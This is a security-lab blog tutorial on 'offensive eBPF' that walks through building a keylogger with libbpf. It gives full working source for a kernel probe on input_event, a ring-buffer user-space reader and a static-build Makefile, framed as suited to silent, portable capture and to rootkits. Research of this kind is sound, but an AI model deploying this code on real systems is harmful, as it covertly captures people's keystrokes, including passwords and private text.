Feb 5, 2026 by Zacharia Mansouri | 104 views
https://cylab.be/blog/482/offensive-ebpf-building-a-keylogger-with-libbpf
Sophisticated surveillance tools do not always need to break the system. Often, they simply use it exactly as intended. Imagine a single, lightweight binary capable of running on many Linux server regardless of the underlying kernel version. It silently captures every keystroke without requiring a compiler on the target or loading visible kernel modules. In a previous blog post, we explored this concept using a simple bpftrace script. In this one, we will take that logic and port it to libbpf. This allows us to move away from runtime dependencies and build a standalone C application that leverages Ring Buffers for efficient event processing.
In a previous blog post , we used bpftrace to rapidly prototype a keylogger. While bpftrace is excellent for one-liners and quick investigations, it relies on the LLVM backend to compile scripts at runtime, which adds startup latency and requires heavy dependencies on the target machine. For building robust, production-grade security tools (or rootkits), we need to move to libbpf. This is the modern standard for eBPF development. It allows us to write Compile Once - Run Everywhere (CO-RE) applications that are lightweight, pre-compiled binaries, and extremely fast. In this post, we will port our keylogger logic from a script to a full-fledged C application using libbpf and Ring Buffers for high-performance data exfiltration.
The older way of writing BPF tools (using the BCC framework) required the Python runtime to compile C code on the fly, effectively requiring the target machine to have kernel headers and a compiler installed. libbpf solves this with CO-RE that ensures:
vmlinux.h that contains every type definition used by the kernel.program.bpf.c)This file runs inside the kernel. Its only job is to hook the input_event function, filter for key presses, and push the data into a Ring Buffer.
First, we define our environment. Notice we don’t include <linux/sched.h> or other system headers. Instead, we include "vmlinux.h". This single file will be generated by bpftool and contains definitions for every struct, union, and typedef in the running kernel.
We also define the structure of the data we want to export: the timestamp (ts) and the key code (code).
#include <linux/types.h> // for types like __u64
#include <linux/ptrace.h> // for structs like pt_regs and macros like PT_REGS_PARM2
#include <linux/bpf.h> // for identifiers like BPF_MAP_TYPE_RINGBUF
#include "vmlinux.h"
#define __TARGET_ARCH_x86 // satisfy PT_REGS_PARMx
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h> // for PT_REGS_PARMx
#include <linux/input-event-codes.h> // safe for EV_KEY
struct key_event_t {
__u64 ts;
__u32 code;
};
char LICENSE[] SEC("license") = "GPL";
We define a map called events of type BPF_MAP_TYPE_RINGBUF. This acts as a circular queue. The kernel writes to the tail, and our user-space app reads from the head. We allocate a generous 16MB buffer (1 << 24) to ensure we never drop a keystroke, even under heavy load.
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1 << 24); // 16MB
} events SEC(".maps");
We attach our function to kprobe/input_event. Just like in our previous blog post, when using a bpftrace script, we’ll need to access the arguments. However, in compiled C, we use architecture-specific macros (PT_REGS_PARM2, etc.) to read the CPU registers where the arguments are stored:
input_dev): The pointer to the input device name (we won’t use it here).type): Checks if it is a keyboard event (EV_KEY).code): The actual key being pressed.value): The state (e.g. pressed, released).SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
__u32 type = PT_REGS_PARM2(ctx);
__u32 code = PT_REGS_PARM3(ctx);
__s32 value = PT_REGS_PARM4(ctx);
// Filter: We only want key presses (value == 1) of type EV_KEY
if (type == EV_KEY && value == 1) {
struct key_event_t *data;
// Reserve space in the Ring Buffer
data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
if (!data)
return 0;
// Populate the data
data->ts = bpf_ktime_get_ns();
data->code = code;
// Commit (Submit) the data to user space
bpf_ringbuf_submit(data, 0);
}
return 0;
}
program.c)The user-space component loads the BPF program and “consumes” the events from the ring buffer. Among the included headers, program.skel.h is an auto-generated header file that creates a C struct representing our BPF program. It handles all the low-level work of creating maps, loading bytecode, and attaching probes. This reduces hundreds of lines of boilerplate code into just open, load, and attach.
This function is triggered automatically by libbpf whenever new data arrives in the ring buffer. It simply casts the raw memory to our key_event_t struct and prints it.
#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h> // to avoid implicit declaration of functions such as bpf_map_update_elem()
#include "program.skel.h"
struct key_event_t {
__u64 ts;
__u32 code;
};
static int handle_event(void *ctx, void *data, size_t len) {
struct key_event_t *event = data;
printf("Key code: %u at time %llu\n", event->code, event->ts);
return 0;
}
Inside the main function, we perform the lifecycle management. program_bpf__open_and_load() is a convenience function that handles verifying the BPF bytecode with the kernel. program_bpf__attach() activates the kprobes.
int main() {
struct program_bpf *skel = program_bpf__open_and_load();
if (!skel) {
fprintf(stderr, "Failed to load skeleton\n");
return 1;
}
if (program_bpf__attach(skel)) {
fprintf(stderr, "Failed to attach BPF program\n");
return 1;
}
Finally, we set up the ring buffer manager. We link it to the file descriptor of our events map and pass our handle_event callback. The while loop essentially puts the program to sleep until the kernel wakes it up with new data.
struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
if (!rb) return 1;
while (1) {
ring_buffer__poll(rb, -1); // blocks until event arrives
}
ring_buffer__free(rb);
program_bpf__destroy(skel);
return 0;
}
If you are developing this on a headless server or a VM, you might not have a physical keyboard attached. In order to verify that the tool works, we can simulate hardware input events using a program called input-emulator.
sudo apt install meson # If not installed already (other dependencies might be missing)
git clone https://github.com/tio/input-emulator
cd input-emulator
meson build
meson compile -C build
sudo meson install -C build
Launch the compiled binary in your first terminal:
sudo ./program
In a second terminal, spin up the virtual keyboard and type the letter 'a':
sudo input-emulator start kbd # Start virtual keyboard
sudo input-emulator kbd key a # Press a virtual key
The agent will output:
Key code: 30 at time 17356892
...
To keep the project structure clean and standardized, this code follows the pattern outlined in the eBPF CO-RE guide. This ensures we are using modern CO-RE best practices, separating the kernel logic, the user-space controller, and the build system into distinct, manageable components.
Hereunder is the complete source code for the project.
program.bpf.c)#include <linux/types.h>
#include <linux/ptrace.h>
#include <linux/bpf.h>
#include <linux/input-event-codes.h> // Such as EV_KEY
#include "vmlinux.h" // CO-RE types
#define __TARGET_ARCH_x86
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
struct key_event_t {
__u64 ts;
__u32 code;
};
// Ring buffer for user-space events (16MB)
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1 << 24);
} events SEC(".maps");
// Hook: void input_event(struct input_dev *dev, unsigned int type, unsigned int code, int value)
SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
__u32 type = PT_REGS_PARM2(ctx); // arg2: type
__u32 code = PT_REGS_PARM3(ctx); // arg3: key code
__s32 value = PT_REGS_PARM4(ctx); // arg4: state (0=up, 1=down)
// Filter: We only want key presses (value == 1) of type EV_KEY
if (type == EV_KEY && value == 1) {
struct key_event_t *data;
// Reserve space in the Ring Buffer
data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
if (!data)
return 0;
// Populate the data
data->ts = bpf_ktime_get_ns();
data->code = code;
// Commit (Submit) the data to user space
bpf_ringbuf_submit(data, 0);
}
return 0;
}
char LICENSE[] SEC("license") = "GPL";
program.c)#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>
#include "program.skel.h" // Auto-generated header via bpftool
// Matches memory layout of struct in kernel code
struct key_event_t {
__u64 ts;
__u32 code;
};
// Callback triggered when data arrives from the kernel
static int handle_event(void *ctx, void *data, size_t len) {
struct key_event_t *event = data; // Cast raw bytes to event struct
printf("Key code: %u at time %llu\n", event->code, event->ts);
return 0;
}
int main() {
// Load bytecode and verify maps
struct program_bpf *skel = program_bpf__open_and_load();
if (!skel) {
fprintf(stderr, "Failed to load skeleton\n");
return 1;
}
// Attach bpf program to kernel hooks
if (program_bpf__attach(skel)) {
fprintf(stderr, "Failed to attach BPF program\n");
return 1;
}
// Configure the ring buffer consumer with a callback
struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
if (!rb) return 1;
while (1) {
// Block indefinitely until an event occurs
ring_buffer__poll(rb, -1);
}
// Free the resources
ring_buffer__free(rb);
program_bpf__destroy(skel);
return 0;
}
Makefile)To build this, simply run make. It handles generating vmlinux.h, compiling the BPF code to bytecode, generating the skeleton header, and linking the final binary.
# Compiler settings
BPF_CLANG=clang
# Kernel side flags
BPF_CFLAGS=-g -O2 -target bpf
# Userspace side flags
# FIX: Added -std=gnu99 to prevent C23 symbol issues (like __isoc23_strtoull)
USER_CFLAGS=-g -O2 -std=gnu99
# --- LIBBPF CONFIG ---
# Point to the library we built locally
LIBBPF_DIR = ./libbpf/build
LIBBPF_OBJ = $(LIBBPF_DIR)/libbpf.a
# Include the headers we installed into libbpf/build/usr/include
# We also include uapi for kernel definitions if needed
INCLUDES = -I$(LIBBPF_DIR)/usr/include -I./libbpf/include/uapi
# Link Statically: Bundles libbpf into the binary
STATIC_LDFLAGS = -static -Wl,--whole-archive $(LIBBPF_OBJ) -Wl,--no-whole-archive -lelf -lz
# Project Name
NAME=program
BPFOBJ=$(NAME).bpf.o
SKELETON=$(NAME).skel.h
EXEC=$(NAME)
# --- TARGETS ---
# Build User-Space Executable
$(EXEC): $(SKELETON) $(NAME).c
$(BPF_CLANG) $(USER_CFLAGS) $(INCLUDES) $(NAME).c $(STATIC_LDFLAGS) -o $(EXEC)
# Build BPF Kernel Object
$(BPFOBJ): $(NAME).bpf.c vmlinux.h
$(BPF_CLANG) $(BPF_CFLAGS) $(INCLUDES) -c $(NAME).bpf.c -o $(BPFOBJ)
# Generate vmlinux.h (The "All-in-One" Kernel Header)
vmlinux.h:
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
# Generate Skeleton Header (Bridge between Kernel and User)
$(SKELETON): $(BPFOBJ)
bpftool gen skeleton $(BPFOBJ) > $(SKELETON)
clean:
- rm -f *.o *.skel.h vmlinux.h $(EXEC)
The move from a script based workflow to a compiled engineering model is a real step up, with libbpf and Ring Buffers giving us something that uses far less CPU than bpftrace, stays within the verifier’s safety rails, and can run on other machines with similar kernels without dragging along heavy dependencies.
This blog post is licensed under
CC BY-SA 4.0